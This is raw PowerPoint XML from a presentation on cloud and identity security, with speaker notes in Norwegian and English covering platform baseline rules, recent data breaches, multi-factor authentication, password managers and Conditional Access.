        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4080063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38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3407110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 Flere sårbarheter en før</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t>* Legge til felles kjøreregler på grunnmuren i plattformen </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Definere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>må</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>overvåkning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, backup, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>definerte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sikkerhetsmekanismer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> er </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Tilgang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>til</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenesten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> bade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sluttbruker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>utvikler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> er </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>basert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>på</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kontekst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Benytte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kontinuerlig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>oppdaterte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kontinuerlig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sårbarheter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>applikasjonene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>eller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenesten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Overvåkning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> av </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Viktigste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> element </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>skyplatform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>gir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> er jo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>automatisering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>kan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>benyttes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for å </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> alle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>disse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>mekaniseme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>samt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>også</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bygging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> av </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>applikasjonen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Med </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>disse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>mekanismene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bunn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>har</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> man et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>godt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>grunnlag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>fremtidige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tjenester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>blir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etablert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>på</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>skyplattform</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99E83D-10BD-4912-838C-C14C2B9472B3}" type="slidenum">
              <a:rPr kumimoji="0" lang="fr-FR" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Tahom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fr-FR" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40919326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99E83D-10BD-4912-838C-C14C2B9472B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5955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99E83D-10BD-4912-838C-C14C2B9472B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150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99E83D-10BD-4912-838C-C14C2B9472B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816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99E83D-10BD-4912-838C-C14C2B9472B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3175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99E83D-10BD-4912-838C-C14C2B9472B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5813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99E83D-10BD-4912-838C-C14C2B9472B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9662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99E83D-10BD-4912-838C-C14C2B9472B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495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99E83D-10BD-4912-838C-C14C2B9472B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4255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99E83D-10BD-4912-838C-C14C2B9472B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4526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38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="942326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99E83D-10BD-4912-838C-C14C2B9472B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04644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99E83D-10BD-4912-838C-C14C2B9472B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9774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99E83D-10BD-4912-838C-C14C2B9472B3}"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40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 do not need to search for a long time to find news about Data breaches where billions of identities, passwords and email accounts have been stolen from a big variety of digital accounts and businesses all over the world, just looking back one year we have seen 1 Million of WordPress Customers data being stolen due to that malicious third-party managed to gain access to it’s managed WordPress hosting environment by using compromised password, they say that it’s not immediately clear if the compromised password was secured with two-factor authentication, but personally and in my experience sadly they are often not protected with Multi factor authentication. It can be very destructive and even more expensive to be hit with a data breach like we saw in March this year when Meta Platform owner of Facebook and WhatsApp was fined 18.6 Million Dollars in GDPR Fine due to 12 Data Breaches in 2018. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2823838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So to be more prepared for these data breaches that we saw in the last slide we need to think about our identities and the responsibility is always with you the users, there are tons of tools that we can use to protect our identity and methods that are sophisticated enough to tell us if we are doing something wrong, I’m going to list few tools and strategies that both work for your personal digital identity as well as for organization and enterprise identities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>First of all, use Multi Factor Authentication, I think 99% of most sites and services offers some form of multi-factor authentication, make it your priority when creating a new account to enable Multi-factor authentication, and if the site or service doesn’t support MFA, use some dummy / secondary email to create account there, because that’s a clear sign that they don’t take security seriously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Separate your personal accounts from your work &amp; school accounts, this one is maybe obvious when it comes to security minded people, but this has often been a key information in data breaches when malicious actors breach some vulnerable site, and there they get email and password for an employee that has used his employer email address and sadly often the same password that they use when logging on to their work environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>By all means do not use the same password for your accounts, I know it’s frustrating remembering all these passwords, but make it simple for example, use something that identifies the site or service that you are creating password for and then something you use normally, that will at least make every password different and helps avoiding bots and password sprayers checking if your compromised email and/or password works on more sites and services, or simply use Password managers to create random password and use it to help you “remember” it.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Utilize Password Managers to help you “remember” all these passwords, online for personal sites and service and even business if allowed, and offline Password manager for more sensitive work-related services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>Passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> authentication if available, for example Microsoft Personal Account offers Password Less sign in, and I’ve seen few other services that has started to offer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>Passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> Sign-in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Avoid using your Social Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>Identies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> for Single Sign-on to important site and services., because If you lose your Social Media Account then you’ve lost access to a lot of other maybe important services to you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="795294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2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="968716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So what is Conditional Access, Conditional Access is at the heart of the new identity driven control plane, it’s a key part of implementing zero trust strategy within your organization and applying the right access control when needed to protect your valuable assets. Conditional Access policies are at simplest if-then statements that determine if a user wants to access a resource, then they must complete an action. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>So why should we use Conditional Access ? &lt;Next Slide&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3587538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noProof="0" dirty="0"/>
              <a:t>So why should we use Conditional Access ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" noProof="0" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t> primary goals of using Conditional access is to empower users to be productive wherever and whenever, protect your valuable organization assets, it can enforce actions if a risky user activity is detected, it has the possibility to use report only mode which gives you more overview of the policy impact before applying the policy, and is targeted towards users, groups and now in public preview single tenant workload identities or often called Service Principals making them a bit more secure then before as it is hard to monitor those identities due to being often used for applications and deployments.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2979915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2D38D343-5AFC-4AA8-ACCA-EB0ACBB32CDA}" type="slidenum">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="581568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28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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BE9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232309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543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/19/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="2286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E9AD569-83DD-4E5B-AF97-63825DE45633}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="581204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3E7FF3-8ADF-4096-A73C-46D62188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4025" y="432332"/>
            <a:ext cx="5983950" cy="5993336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353355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28543BDC-0553-40FA-A4DB-EDAAA606CFF6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/20/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6554697"/>
            <a:ext cx="5029200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
